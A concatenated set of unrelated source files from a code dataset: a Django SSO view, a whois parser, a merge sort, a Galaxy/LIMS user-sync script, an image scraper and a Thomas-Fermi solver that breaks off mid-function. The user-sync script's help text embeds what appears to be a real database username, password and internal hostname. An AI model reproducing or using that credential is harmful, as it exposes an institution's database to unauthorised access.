function\n# context = super(HomeView, self).get_context_data(**kwargs)\n# print(self)\n# return context\n \n \n\n### Questions\n\n# 1. Does the domain of the app thats using sso has to match the domain you are using (1 domain like spark example)\n# 2. Is the SSO config within imis configured correctly. Like encryption key, domain name. (We are trying to get the info once it comes back)\n\n# Possible things that can go wrong\n# 1. seems to be a cookie we can't access. \n\nimport urllib\nimport xmltodict\nimport urllib2\nimport httplib2\nimport os\nfrom httplib2 import Http as external_http\nimport socket\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import redirect\nfrom django.views.generic.base import View, TemplateView\nfrom django.http import HttpResponse\n\nclass LoginView(View):\n \n def get(self, request, *args, **kwargs):\n # check if user is already logged in\n # if not, check if there is SSO info, and if so, log user in (maybe have to save info?)\n print('in get')\n print(socket.gethostname())\n print(socket.getfqdn())\n if (request.user.is_anonymous()):\n sso_return_url = request.GET.get('ReturnUrl')\n if sso_return_url:\n redirect_to = 'home'\n \n else:\n # If there is no login info, then redirect to the SSO\n base_url = \"http://www.hospitalmedicine.org/Web/SHMLogin.aspx\"\n local_url = \"https://django-sso-climberwb.c9users.io\"\n production_url = \"https://test.hospitalmedicine.org\"\n # For local uncomment\n if('ID' in os.environ ):\n production_url=local_url\n return_url = \"/SSO/Copy_of_SSOLogin.aspx?HMRedirect=%s%s?ReturnUrl=/\" % (production_url, reverse('login'))\n query_params = {\n 'LoginRedirect': 'true',\n 'returnUrl': return_url,\n }\n \n redirect_to = '%s?%s' % (base_url, urllib.urlencode(query_params))\n return redirect(redirect_to)\n else:\n return redirect('home')\n \n \nclass HomeView(TemplateView):\n template_name = 'sso_login/home.html'\n \n def get_context_data(self, **kwargs):\n # print('in get_context_data')\n # print(self)\n # TODO maybe remove this function\n print('--- cookies ---')\n print('cookie-id ',self.request.COOKIES.get('mytest'))\n useriMISID = self.request.COOKIES.get('mytest')\n # For Local Uncommment\n if('ID' in os.environ ):\n useriMISID = os.environ['ID'] \n\n username, first_name, last_name, member_type, has_bought = None, None, None, None, None\n\n ### CALL 1 to get user info\n if useriMISID:\n values_1 = dict(useriMISID=useriMISID)\n 
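The SSO redirect above is assembled with Python 2's urllib.urlencode; the same construction under Python 3 looks like this (URLs are placeholders, not the real endpoints):

from urllib.parse import urlencode

base_url = "https://sso.example.org/Login.aspx"   # placeholder
query = urlencode({"LoginRedirect": "true",
                   "returnUrl": "/app/login?ReturnUrl=/"})
redirect_to = "%s?%s" % (base_url, query)
print(redirect_to)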
url_1 = 'http://www.hospitalmedicine.org/custom/service/shm_service.asmx/GetUserByUserID'\n data = urllib.urlencode(values_1)\n req = urllib2.Request(url_1, data)\n rsp = urllib2.urlopen(req)\n content_1 = rsp.read()\n print(rsp, content_1)\n obj = xmltodict.parse( content_1 )\n username = obj['UserInfo']['UserName']\n first_name = obj['UserInfo']['FirstName']\n last_name = obj['UserInfo']['LastName']\n member_type = obj['UserInfo']['MemberType']\n \n ### CALL 2 to get store info \n \n values_2 = dict(useriMISID=useriMISID,productCode='TEST_SURVEY')\n url_2 = 'http://www.hospitalmedicine.org/custom/service/shm_service.asmx/UserCanAccessProduct'\n data = urllib.urlencode(values_2)\n req = urllib2.Request(url_2, data)\n rsp = urllib2.urlopen(req)\n content_2 = rsp.read()\n print(rsp, content_2)\n obj_2 = xmltodict.parse( content_2 )\n has_bought = obj_2['boolean']['#text']\n context = super(HomeView, self).get_context_data(**kwargs)\n \n context['username'] =username\n context['firstname'] = first_name\n context['lastname'] = last_name\n context['membertype'] = member_type\n context['has_bought'] = has_bought\n return context\n \n \n\n### Questions\n\n# 1. Does the domain of the app thats using sso has to match the domain you are using (1 domain like spark example)\n# 2. Is the SSO config within imis configured correctly. Like encryption key, domain name. (We are trying to get the info once it comes back)\n\n# Possible things that can go wrong\n# 1. seems to be a cookie we can't access. \n\n","sub_path":"sso_login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"427927014","text":"import re\nfrom subprocess import PIPE, CalledProcessError, run\n\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext as _\n\nfrom ..validators import validate_as_number\n\nINEXISTENT_ASN = _('ASN Does not exist.')\n\n\ndef get_whois(asn):\n try:\n validate_as_number(asn)\n data = run(['whois', 'AS' + str(asn)], stdout=PIPE)\n data.check_returncode()\n return data.stdout\n except (TypeError, ValidationError, CalledProcessError) as e:\n raise ValidationError(INEXISTENT_ASN)\n\n\ndef decode_line(line):\n try:\n return line.decode(\"utf-8\")\n except:\n return line.decode(\"latin1\")\n\n\ndef parse_whois(whois_content):\n if whois_content is None:\n raise ValidationError(INEXISTENT_ASN)\n\n final_list = list()\n line_break = False\n\n for line in whois_content.split(b'\\n'):\n decoded_line = decode_line(line)\n\n # If it's a blank line or a comment\n if final_list and re.match(r'^\\s*(?:%.*)?$', decoded_line):\n line_break = True\n\n # Tuple (field, value) with format field: value % possible comment\n match_content = re.match(r'^\\s*\\b([\\w\\d-]*):\\s*((?:(?! 
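xmltodict.parse turns the service's XML payload into nested dicts, which is what the obj['UserInfo']['UserName'] lookups above rely on. A minimal illustration with inline XML:

import xmltodict

doc = xmltodict.parse(
    "<UserInfo><UserName>jdoe</UserName><MemberType>FULL</MemberType></UserInfo>")
assert doc["UserInfo"]["UserName"] == "jdoe"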
%.*$).)*)',\n decoded_line)\n if match_content:\n if line_break:\n final_list.append(('', ''))\n line_break = False\n final_list.append(match_content.groups())\n\n if not final_list:\n raise ValidationError(INEXISTENT_ASN)\n\n return final_list\n\n\ndef get_parsed_whois(asn):\n return parse_whois(get_whois(asn))\n","sub_path":"ipaxi/ixbr_api/core/utils/whoisutils.py","file_name":"whoisutils.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"44932619","text":"# 병합 정렬 알고리즘 \r\nfrom typing import MutableSequence\r\ndef MergeSort(a:MutableSequence) ->None:\r\n \"\"\"병합정렬\"\"\"\r\n def _merge_sort(a:MutableSequence, left:int, right:int) -> None:\r\n\r\n if left < right:\r\n center = (left + right) // 2\r\n\r\n _merge_sort(a,left,center)\r\n _merge_sort(a,center+1,right)\r\n\r\n p = j = 0\r\n i = k = left\r\n\r\n while i <= center:\r\n buff[p] = a[i]\r\n p+=1\r\n i+=1\r\n\r\n while i <= right and j < p:\r\n if buff[j] <= a[i]:\r\n a[k] = buff[j]\r\n j+=1\r\n\r\n else:\r\n a[k] = a[i]\r\n i+=1\r\n k+=1\r\n\r\n while j < p:\r\n a[k] = buff[j]\r\n k += 1\r\n j += 1\r\n \r\n n = len(a)\r\n buff = [None] * n\r\n _merge_sort(a,0,n-1)\r\n del buff \r\n\r\n\r\nif __name__ == '__main__':\r\n num = int(input('배열의 크기 : '))\r\n x = [None] * num\r\n\r\n for i in range(num):\r\n x[i] = int(input(f'x[{i}] : '))\r\n\r\n MergeSort(x)\r\n\r\n for i in range(num):\r\n print(f'{x[i]}',end=' ')","sub_path":"sort_algorithm/bubble_sort/merge_sort/merge_sort_list.py","file_name":"merge_sort_list.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"286494397","text":"#!/usr/bin/env python\n'''\nmanage_limsusers.py\n\nCreated by Anne Pajon on 02 Apr 2012\nCopyright (c) 2012 Cancer Research UK - Cambridge Research Institute.\n\nTesting creation of users\nssh uk-cri-lbio08\n\nTo connect to LIMS database\n/opt/local/server/database/mysql/bin/mysql -h uk-cri-lbio04 -u Galaxy -p\n\nTo connect to Galaxy database\n/opt/local/server/database/postgres/bin/psql -h localhost -p 5432 -U galaxy -d galaxy\n'''\n\nimport optparse\nimport logging as log\nimport os, sys\nfrom ConfigParser import SafeConfigParser\nfrom collections import defaultdict\n\ndef main() :\n # logging configuration\n log.basicConfig(format='%(levelname)s: %(message)s', level=log.DEBUG)\n\n # get the command line options\n parser = optparse.OptionParser()\n parser.add_option(\"--lims\", dest=\"lims_server\", action=\"store\", help=\"lims server driver://user[:password]@host[:port]/database (mysql://Galaxy:9414xy@uk-cri-lbio04/cri_general)\")\n parser.add_option(\"--dropall\", dest=\"dropall\", action=\"store_true\", default=False, help=\"drop all users/groups and their associated roles in Galaxy\")\n (options, args) = parser.parse_args()\n try:\n assert options.lims_server\n except:\n parser.print_help()\n sys.exit( 1 )\n\n # check env variable define\n if not os.environ['GALAXY_HOME']:\n log.error('Env variable $GALAXY_HOME is not set.')\n sys.exit(1)\n \n # set default Galaxy config file universe_wsgi.ini\n default_config = os.path.join( os.environ['GALAXY_HOME'] , 'universe_wsgi.ini')\n if not os.path.isfile(default_config):\n log.error('Default Galaxy config file %s does not exist.' 
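The whois parser above captures each `field: value` pair while a negative lookahead stops the value before a trailing `%` comment. A quick demonstration of that line regex:

import re

LINE_RE = re.compile(r'^\s*\b([\w\d-]*):\s*((?:(?! %.*$).)*)')
m = LINE_RE.match("origin: AS65000 % RIR comment")
assert m.groups() == ("origin", "AS65000")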
% default_config)\n sys.exit(1)\n config = os.path.abspath( default_config )\n os.chdir( os.path.dirname( config ) )\n sys.path.append( 'lib' )\n\n # import Galaxy\n from galaxy import eggs\n import pkg_resources\n pkg_resources.require( \"SQLAlchemy >= 0.4\" )\n from sqlalchemy.ext.sqlsoup import SqlSoup\n\n # parse config file\n config = SafeConfigParser()\n config.read( os.path.basename( default_config ) )\n\n # get Galaxy database connection\n galaxy_db = config.get( \"app:main\", \"database_connection\" )\n from galaxy.model import mapping\n model = mapping.init( config.get( 'app:main', 'file_path' ), config.get( 'app:main', 'database_connection' ), create_tables = False )\n session = model.session\n\n # get CRI lims database connection\n lims_db = SqlSoup(options.lims_server)\n\n if options.dropall:\n dropall(config, model, session)\n else:\n create_limsusers(model, session, lims_db)\n\ndef dropall(config, model, session):\n # query Galaxy db to get users & groups & roles\n galaxy_users = session.query(model.User)\n galaxy_groups = session.query(model.Group)\n galaxy_roles = session.query(model.Role)\n galaxy_grouproles = session.query(model.GroupRoleAssociation)\n galaxy_usergroups = session.query(model.UserGroupAssociation).join(model.User)\n # get Galaxy admin users\n admin_users = config.get('app:main', 'admin_users').split(',')\n for admin_user in admin_users:\n log.debug(\"Admin email user %s\" % admin_user)\n # delete all associations first\n for association in galaxy_grouproles:\n session.delete(association)\n log.debug(\"Deleting association %s\" % association.id)\n for association in galaxy_usergroups:\n if not association.user.email in admin_users:\n session.delete(association)\n log.debug(\"Deleting association %s with user %s\" % (association.id, association.user.email))\n # delete all users except Galaxy admin ones\n for user in galaxy_users:\n if not user.email in admin_users:\n session.delete(user)\n log.debug(\"Deleting user %s\" % user.email)\n # delete all groups\n for group in galaxy_groups:\n session.delete(group)\n log.debug(\"Deleting group %s\" % group.name)\n # delete all roles except private ones associated to Galaxy admin users\n for role in galaxy_roles:\n if not role.name in admin_users:\n session.delete(role)\n log.debug(\"Deleting role %s\" % role.name)\n # commit\n session.flush()\n\n\ndef create_limsusers(model, session, lims_db):\n # query Galaxy db to get users & groups\n galaxy_users = session.query(model.User)\n galaxy_groups = session.query(model.Group)\n galaxy_groupnames = []\n for user in galaxy_users:\n log.debug(\"Existing user in Galaxy: %s\" % user.email)\n for group in galaxy_groups:\n galaxy_groupnames.append(group.name)\n log.debug(\"Existing group in Galaxy: %s\" % group.name)\n\n # get CRI lims users & groups\n lims_users = lims_db.user.all()\n lims_usergroups = defaultdict(list)\n for user in lims_users:\n group = lims_db.groups.filter_by(id=user.group_id).one()\n institution = lims_db.institution.filter_by(id=group.institution_id).one()\n #log.debug(\"%s\\t%s\\t%s\\t%s\" % (user.accountId, user.email, group.name, institution.name))\n lims_usergroups[\"%s__%s\" % (institution.name.replace(' ', '_'), group.name.replace(' ', '_'))].append(user)\n\n # create lims groups & users into galaxy\n for group_name in lims_usergroups.keys():\n # create group\n galaxy_group = session.query(model.Group).filter_by(name=group_name).first()\n if not galaxy_group:\n galaxy_group = model.Group(group_name)\n session.add(galaxy_group)\n log.debug(\"+++ 
Add new group %s\" % galaxy_group.name)\n else:\n log.debug(\"Group %s already exists\" % galaxy_group.name)\n # create role for group\n galaxy_role = session.query(model.Role).filter_by(name=galaxy_group.name).first()\n if not galaxy_role:\n galaxy_role = model.Role(galaxy_group.name, 'Role for group %s' % galaxy_group.name)\n session.add(galaxy_role)\n log.debug(\"+++ Add new role for group %s\" % galaxy_group.name )\n else:\n log.debug(\"Role for group %s already exists\" % galaxy_group.name )\n # associate group and role\n galaxy_group_role_association = session.query(model.GroupRoleAssociation).filter_by(role_id=galaxy_role.id, group_id=galaxy_group.id).first()\n if not galaxy_group_role_association:\n galaxy_group_role_association = model.GroupRoleAssociation(galaxy_group, galaxy_role)\n session.add(galaxy_group_role_association)\n log.debug(\"+++ Associate group %s with its role %s\" % (galaxy_group.name, galaxy_role.name))\n else:\n log.debug(\"Group %s already associated with its role %s\" % (galaxy_group.name, galaxy_role.name)) \n # create users\n for lims_user in lims_usergroups[group_name]:\n galaxy_user = session.query(model.User).filter_by(email=lims_user.email, username=lims_user.accountId).first()\n if not galaxy_user:\n galaxy_user = model.User(lims_user.email)\n galaxy_user.set_password_cleartext(lims_user.password)\n galaxy_user.username = lims_user.accountId\n session.add(galaxy_user)\n log.debug(\"+++ Add new user %s\" % galaxy_user.email)\n else:\n log.debug(\"User %s already exists\" % galaxy_user.email)\n # associate user and group\n galaxy_user_group_association = session.query(model.UserGroupAssociation).filter_by(user_id=galaxy_user.id, group_id=galaxy_group.id).first()\n if not galaxy_user_group_association:\n galaxy_user_group_association = model.UserGroupAssociation(galaxy_user, galaxy_group)\n session.add(galaxy_user_group_association)\n log.debug(\"+++ Add user %s into group %s\" % (galaxy_user.email, galaxy_group.name))\n else:\n log.debug(\"User %s already in group %s\" % (galaxy_user.email, galaxy_group.name))\n # create private role for each user using user email\n private_role_name = \"%s\" % (galaxy_user.email)\n galaxy_private_role = session.query(model.Role).filter_by(name=private_role_name).first()\n if not galaxy_private_role:\n galaxy_private_role = model.Role(private_role_name, 'Private role for %s' % private_role_name, 'private')\n session.add(galaxy_private_role)\n log.debug(\"+++ Add new private role for user %s\" % private_role_name)\n else:\n log.debug(\"Private role for user %s already exists\" % private_role_name)\n # associate user and private role\n galaxy_user_private_role_association = session.query(model.UserRoleAssociation).filter_by(role_id=galaxy_private_role.id, user_id=galaxy_user.id).first()\n if not galaxy_user_private_role_association:\n galaxy_user_private_role_association = model.UserRoleAssociation(galaxy_user, galaxy_private_role)\n session.add(galaxy_user_private_role_association)\n log.debug(\"+++ Associate user %s with its private role %s\" % (galaxy_user.email, galaxy_private_role.name))\n else:\n log.debug(\"User %s already associated with its private role %s\" % (galaxy_user.email, galaxy_private_role.name))\n # associate user and group role\n galaxy_user_role_association = session.query(model.UserRoleAssociation).filter_by(role_id=galaxy_role.id, user_id=galaxy_user.id).first()\n if not galaxy_user_role_association:\n galaxy_user_role_association = model.UserRoleAssociation(galaxy_user, galaxy_role)\n 
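Every object in the sync above follows the same query-then-create shape so reruns stay idempotent. The pattern extracted on its own (a SQLAlchemy-style sketch; the helper name and defaults handling are hypothetical, not part of the script):

def get_or_create(session, model, defaults=None, **lookup):
    # Return an existing row matching `lookup`, or stage a new one; this is
    # the query/filter_by/first-then-add idiom the sync loop repeats per
    # user, group, role, and association.
    obj = session.query(model).filter_by(**lookup).first()
    if obj is None:
        obj = model(**{**lookup, **(defaults or {})})
        session.add(obj)
    return obj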
session.add(galaxy_user_role_association)\n log.debug(\"+++ Associate user %s with its group role %s\" % (galaxy_user.email, galaxy_role.name))\n else:\n log.debug(\"User %s already associated with its group role %s\" % (galaxy_user.email, galaxy_role.name))\n # commit\n session.flush()\n \nif __name__ == '__main__':\n main()\n","sub_path":"admin/scripts/manage_limsusers.py","file_name":"manage_limsusers.py","file_ext":"py","file_size_in_byte":9983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"620441572","text":"from bs4 import BeautifulSoup\nimport requests\nimport _thread\nimport os,time\nclass meitu(object):\n def __init__(self,url):\n self.url = url\n self.urls = []\n self.dir = url.split('/')[5]+'/'\n if os.path.exists(self.dir) == False:\n os.mkdir(self.dir)\n self.locks = []\n self.nloops = []\n self.direct = ''\n def download(self,url,lock):\n web_content = requests.get(url)\n soup = BeautifulSoup(web_content.text,'lxml')\n imgs_list = soup.body.find(class_ = \"imgs-list\").div.find_all(\"img\")\n imgs_urls = []\n for i in imgs_list:\n imgs_urls.append(i.attrs[\"src\"])\n print(\"解析图片地址成功,开始下载!\")\n self.direct = imgs_urls[0].split('/')[:-1][-1]\n for u in imgs_urls:\n r = requests.get(u)\n with open(self.dir+u.split('/')[-1].split('?')[0], \"wb\") as code:\n code.write(r.content)\n lock.release()\n def geturls(self):\n web_content = requests.get(self.url)\n soup = BeautifulSoup(web_content.text,'lxml')\n detail_page = soup.body.find(class_ = ['detail-pag','meitu-page']).find_all(\"a\")\n for i in detail_page:\n self.urls.append(i.attrs[\"href\"])\n print(\"解析页面地址成功!\")\n def check(self):\n files = os.listdir(self.dir)\n fails = []\n for i in files:\n if os.path.getsize(self.dir+i) == 0:\n fails.append(i)\n if fails != []:\n self.direct = \"http://img.qqzhpt.com/meitustatic/images/img/\"+self.direct+'/'\n print(\"存在文件下载失败,尝试重新下载\")\n for f in fails:\n r = requests.get(self.direct+f)\n with open(self.dir+f, \"wb\") as code:\n code.write(r.content)\n def run(self):\n print(\"爬取开始!\")\n self.geturls()\n self.nloops = range(len(self.urls))\n for i in self.nloops:\n lock = _thread.allocate_lock()\n lock.acquire()\n self.locks.append(lock)\n for i in self.nloops:\n _thread.start_new_thread(self.download,(self.urls[i],self.locks[i],))\n while True:\n flag = 0\n for i in self.nloops:\n if self.locks[i].locked():\n flag = 1\n if flag == 0:\n break\n self.check()\n","sub_path":"qqzhpt.py","file_name":"qqzhpt.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"183215383","text":"# https://careercup.com/question?id=16230693\n\ndef solution(nums, target):\n size = len(nums)\n ops = [[]]\n for i in range(size):\n new_ops = []\n for op in ops:\n for i in (1, 0, -1):\n new_ops.append(op + [i])\n ops = new_ops\n ops.pop()\n\n res = []\n for op in ops:\n cur_sum = 0\n for i in range(len(nums)):\n cur_sum += op[i] * nums[i]\n if cur_sum == target:\n res.append(op)\n return res\n","sub_path":"plus_minus_to_target.py","file_name":"plus_minus_to_target.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"134190026","text":"\n\nfrom xai.brain.wordbase.verbs._bequeath import _BEQUEATH\n\n#calss header\nclass _BEQUEATHS(_BEQUEATH, ):\n\tdef __init__(self,): \n\t\t_BEQUEATH.__init__(self)\n\t\tself.name = \"BEQUEATHS\"\n\t\tself.specie = 
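The plus/minus search above hand-rolls the enumeration of coefficient vectors over {1, 0, -1}; itertools.product expresses the same brute force more directly (an alternative sketch, not the original code):

from itertools import product

def signed_sums_to_target(nums, target):
    # Try every coefficient vector in {1, 0, -1}^n and keep the ones whose
    # weighted sum hits the target.
    return [ops for ops in product((1, 0, -1), repeat=len(nums))
            if sum(o * n for o, n in zip(ops, nums)) == target]

assert (1, -1) in signed_sums_to_target([2, 2], 0)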
'verbs'\n\t\tself.basic = \"bequeath\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_bequeaths.py","file_name":"_bequeaths.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"208292927","text":"# Module for Thomas-Fermi calculation of electron density along a 1D potential\n\nimport numpy as np\nimport mask\nfrom physics import Physics\nimport scipy.optimize\n \nclass ThomasFermi(Physics):\n '''\n Subclass of the Physics class. Used for all Thomas-Fermi calculations \n '''\n\n def __init__(self,physics):\n Physics.__init__(self,physics)\n \n # There are two broad TF solvers. One of them is a fixed mu solver, which given the dot potentials, finds the expected charge density.\n # The other is a fixed N solver, which given number of electron on each dot, finds the expected charge density.\n # Both solvers take in an initial mask and require the number of dots to be known in advance.\n \n def find_n_dot_estimate(self,fix_mask):\n '''\n Estimate the number of dots and a mask assuming the chemical potential is mu_l everywhere\n\n The mask is defined as a list of size len(x) where x is the x-grid. Each element is labelled as 'l0','l1' corresponding to the leads, 'di' corresponding \n to the ith dot and 'bi' corresponding to the ith barrier.\n\n Counting begins from 0.\n ''' \n\n mu = self.mu_l[0] \n mu_x = np.repeat(mu,len(self.V))\n \n # Use mu - V ~ n to make a preliminary classfication \n if(not fix_mask):\n prelim_mask = mask.Mask(mu_x - self.V) \n self.mask = prelim_mask\n return prelim_mask.mask_info['num_dot'] \n else:\n # return value from the old calculation\n return self.mask.mask_info['num_dot'] \n \n def calculate_mu_x_from_mask(self,mu_d):\n '''\n Takes in a mask object and uses it to form an array of mu_x. 
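find_n_dot_estimate above classifies the 1D grid using the Thomas-Fermi relation mu - V(x) ~ n(x): points where mu - V is positive carry charge (leads and dots) and the rest are barriers. The sign test in isolation:

import numpy as np

def label_occupied(mu_minus_V):
    # 1 where mu - V > 0 (lead or dot), 0 elsewhere (barrier); runs of 1s
    # between barriers are the candidate dots the mask labels 'd0', 'd1', ...
    return (np.asarray(mu_minus_V) > 0).astype(int)

assert label_occupied([0.2, -0.1, 0.3]).tolist() == [1, 0, 1]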
The vector is zero in barrier regions by design since the chemical potential is an unknown in the barrier region.\n\n The lead potentials are taken from the underlying physics object and the mu_d is taken as an argument to this function.\n '''\n \n mu_x = np.zeros(len(self.mask.mask))\n for key,val in self.mask.mask_info.items():\n if (key == 'l0'):\n mu_x[val[0]:val[1] + 1] = self.mu_l[0] \n elif (key == 'l1'):\n mu_x[val[0]:val[1] + 1] = self.mu_l[1] \n elif (key[0] == 'd'):\n mu_x[val[0]:(val[1] + 1)] = mu_d[int(key[1:])]\n else:\n # region is a barrier\n # leave untounced i.e = 0 since the potential over a barrier is an unknown\n pass\n return mu_x \n \n def create_fixed_mu_A(self,mu_d):\n '''\n Creates the LHS matrix for fixed mu Thomas Fermi calculation.\n A z = b\n where z = (n N_d mu_bar)\n A =\n (K 0 mu_bar_constraint\n sum_n N_d_constraint 0\n mu_bar_constraint 0 0)\n '''\n N_grid = len(self.mask.mask)\n num_dot = self.mask.mask_info['num_dot']\n num_barrier_points = self.mask.mask.count('b') \n N_A = N_grid + num_dot + num_barrier_points\n A = np.zeros((N_A,N_A))\n \n A[:N_grid,:N_grid] = self.K\n\n barrier_col_index = N_grid + num_dot \n for key,val in self.mask.mask_info.items():\n # implement the n = 0 barrier constraint thorugh the Lagrange multipliers mu_bar\n if key[0] == 'b':\n barrier_size = val[1] - val[0] + 1 \n A[val[0]:(val[0] + barrier_size),barrier_col_index:(barrier_col_index + barrier_size) ] = -1.0*np.identity(barrier_size)\n A[barrier_col_index:(barrier_col_index + barrier_size),val[0]:(val[0] + barrier_size) ] = np.identity(barrier_size)\n barrier_col_index += barrier_size\n \n # implement the sum_n over dot - N_d constraint\n elif key[0] == 'd':\n dot_col_index = N_grid + int(key[1:])\n dot_size = val[1] - val[0] + 1\n A[dot_col_index,val[0]:(val[0] + dot_size)] = 1 \n A[dot_col_index,dot_col_index] = -1\n return A\n\n def create_fixed_mu_b(self,mu_d):\n '''\n Creates the RHS column vector for fixed mu Thomas Fermi Calculation.\n A z = b\n b =\n ( mu_x - V\n 0\n 0)\n '''\n\n N_grid = len(self.mask.mask)\n num_dot = self.mask.mask_info['num_dot']\n num_barrier_points = self.mask.mask.count('b') \n N_b = N_grid + num_dot + num_barrier_points\n b = np.zeros(N_b)\n \n mu_x = self.calculate_mu_x_from_mask(mu_d)\n b[:N_grid] = mu_x - self.V\n \n return b \n\n def create_fixed_N_A(self,N_d):\n '''\n Creates the LHS matrix for fixed N Thomas Fermi calculation.\n A z = b\n A =\n (K mu_d_constraint mu_bar_constraint\n sum_n 0 0\n mu_bar_constraint 0 0)\n '''\n N_grid = len(self.mask.mask)\n num_dot = self.mask.mask_info['num_dot']\n num_barrier_points = self.mask.mask.count('b') \n N_A = N_grid + num_dot + num_barrier_points\n A = np.zeros((N_A,N_A))\n \n \n A[:N_grid,:N_grid] = self.K\n\n barrier_col_index = N_grid + num_dot \n for key,val in self.mask.mask_info.items():\n # implement the n = 0 barrier constraint thorugh the Lagrange multipliers mu_bar\n if key[0] == 'b':\n barrier_size = val[1] - val[0] + 1 \n A[val[0]:(val[0] + barrier_size),barrier_col_index:(barrier_col_index + barrier_size) ] = -1.0*np.identity(barrier_size)\n A[barrier_col_index:(barrier_col_index + barrier_size),val[0]:(val[0] + barrier_size) ] = np.identity(barrier_size)\n barrier_col_index += barrier_size\n \n # implement the sum_n over dot - N_d constraint\n elif key[0] == 'd':\n dot_col_index = N_grid + int(key[1:])\n dot_size = val[1] - val[0] + 1\n A[dot_col_index,val[0]:val[0] + dot_size] = 1 \n A[val[0]:val[0] + dot_size,dot_col_index] = -1\n return A\n\n def 
create_fixed_N_b(self,N_d):\n '''\n Creates the RHS matrix for fixed N Thomas Fermi calculation\n A z = b\n\n b = \n (-V+mu_x\n N_d\n 0)\n where mu_x is calculated with dot_potentials = 0\n '''\n N_grid = len(self.mask.mask)\n num_dot = self.mask.mask_info['num_dot']\n num_barrier_points = self.mask.mask.count('b') \n N_b = N_grid + num_dot + num_barrier_points\n b = np.zeros(N_b)\n \n # mu_l - V, this is an easy way to use mu_x to calculate \n # set the mu_d to zero\n mu_d = [0.0]*num_dot\n mu_x = self.calculate_mu_x_from_mask(mu_d)\n b[:N_grid] = mu_x - self.V\n b[N_grid:N_grid + num_dot] = N_d\n \n return b\n \n def tf_solver_fixed_mu(self,mu_d):\n '''\n Assumes a mask object and a array of mu_d dot chemical potentials\n The lead potentials are taken from self.mu_l and not explicitly given.\n\n This solves the equation V - mu_mask + K n = 0. The constraint of n = 0 in the barriers is implemented according to the mask.\n Return a n(x) : electron density, N_d : estimate of electrons on each dot\n \n N_dot elements are not integers!\n '''\n if(len(mu_d) != self.mask.mask_info['num_dot']):\n # number of dots in mu_d does not match in the mask\n # This means that mu_d provided is wrong or there is a problem with the mask.\n raise ValueError('Calculation of mu_x failed. Check number of dots in mu_d and the mask') \n \n # Formulate the problem as A z = b\n # z = (n N_d mu_bar) \n \n A = self.create_fixed_mu_A(mu_d) \n b = self.create_fixed_mu_b(mu_d)\n\n z = np.linalg.solve(A,b)\n\n num_dot = len(mu_d)\n N_grid = len(self.mask.mask)\n \n return z[:N_grid],z[N_grid:(N_grid + num_dot)] \n\n def tf_solver_fixed_N(self,N_d):\n '''\n Uses the self.mask object and number of electrons in each dot.\n The lead potentials are taken from self.mu_l and not explicitly given.\n \n It solves the equation V - mu + K n = 0 iteratively for the mask and n(x). The constraint of n = 0 in the barriers is implemented according to the mask.\n\n Returns a n(x) : electron density and mu_d : dot potentials \n ''' \n if(len(N_d) != self.mask.mask_info['num_dot']):\n # number of dots in N_d does not match in the mask\n # This means that mu_d provided is wrong or there is a problem with the mask.\n raise ValueError('Calculation of mu_x failed. Check number of dots in N_d and the mask') \n \n # Formulate the problem as A z = b\n # z = (n mu_d mu_bar) \n\n A = self.create_fixed_N_A(N_d) \n b = self.create_fixed_N_b(N_d)\n\n z = np.linalg.solve(A,b)\n\n num_dot = len(N_d)\n N_grid = len(self.mask.mask)\n return z[:N_grid],z[N_grid:(N_grid + num_dot)] \n\n def tf_solver_fixed_N_opt(self,N_d):\n '''\n Takes in a mask object and number of electrons on each dot.\n The lead potentials are taken from self.mu_l and are not explicitly given.\n\n Optional Solver based on scipy.optimize.minimize. 
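Both direct solvers above assemble one bordered linear system -- stationarity rows K n = mu - V, constraint rows, and matching Lagrange-multiplier columns -- and hand it to np.linalg.solve in one shot. A 2-point toy with a single dot whose total charge is pinned to N (K, V, mu, N are arbitrary illustrative values; the +1 sum row and -1 potential column follow the sign convention of create_fixed_N_A):

import numpy as np

K = np.array([[2.0, 0.5], [0.5, 2.0]])
V = np.array([0.1, 0.2])
mu, N = 1.0, 3.0

A = np.zeros((3, 3))
A[:2, :2] = K
A[:2, 2] = -1.0   # Lagrange-multiplier (dot potential) column
A[2, :2] = 1.0    # sum-over-dot constraint row
b = np.array([mu - V[0], mu - V[1], N])

n0, n1, mu_d = np.linalg.solve(A, b)
assert abs(n0 + n1 - N) < 1e-12   # constraint row enforces the total charge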
Has the added advantage that n >= 0 can be implemented as a constraint.\n '''\n\n def energy(n,V,mu_x,K):\n return np.sum((V - 0.0*mu_x)*n) + 0.5*np.sum(n*np.dot(K,n))\n \n def dot_constraint_function(n,mask,N_d):\n err = 0.0\n for key,val in self.mask.mask_info.items():\n if (key[0] == 'd'):\n err += np.abs(np.sum(n[val[0]:(val[1]+1)]) - N_d[int(key[1:])])\n return err\n \n # easy way to create the required mu_x profile using mu_d = [0] \n mu_x = self.calculate_mu_x_from_mask([0]*self.mask.mask_info['num_dot'])\n\n cons = {'type':'eq','fun':(lambda x: dot_constraint_function(x,self.mask,N_d))}\n\n # initial guess for the solution\n n_0 = np.zeros(len(self.V))\n # bounds parameter defines that n >= 0\n root = scipy.optimize.minimize(lambda x : energy(x,self.V,mu_x,self.K),n_0,bounds=[(0,None)]*len(n_0),constraints=cons)\n\n # find the dot_potentials using V + Kn = mu\n # The dot potential is found from mu calculated at the center of each dot\n mu_d = np.zeros(self.mask.mask_info['num_dot'])\n mu_vec = self.V + np.dot(self.K,root.x)\n for key,val in self.mask.mask_info.items():\n if key[0] == 'd':\n dot_index = int(key[1:])\n dot_center_index = int(0.5*(val[0] + val[1]))\n 